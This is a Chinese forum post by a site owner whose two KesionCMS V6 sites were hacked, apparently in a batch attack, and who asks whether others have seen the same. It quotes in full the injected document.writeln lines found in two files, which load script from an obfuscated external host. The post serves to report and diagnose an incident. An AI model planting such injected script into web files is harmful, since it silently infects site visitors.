我有两个科汛V6的站被挂马了，是同天，同时间段，应该是批量植入代码，可能是批量入侵的。

后台很多asp文件都被植入了代码。

不知大家没有挂的？

被挂的第一现象就是网站首页打不开提示，KS_Cls/Kesion.Label.JSCls.asp

这个文件报错，然后找到这个文件，突然发现第一行多了一行这样的代码：

ocument.writeln('<script language="JavaScript" type="text/javascript" src="http://pt%3928.%39%3966.org" id="scr7ipt4828"  ><\/script>');

清除掉之后，首页打开，又被植入代码！

经仔细检查，首页无挂马的代码，后来检查首页官方自动加载的一个JS文件：KS_INC/ajax.js

检查发现，亦被植入这种代码：

document.writeln('<script id="scr7ipt5728" type="text/javascript" src="http://pt%3928.%39%3966.org" language="JavaScript"  ><\/script>');

可能是我没有按照官方的提示升级吧，我后台在线升级之后，有些是红色的可能没有升级成功，我也就没有去多理会它了，唉。。。

大家有没有这种现象？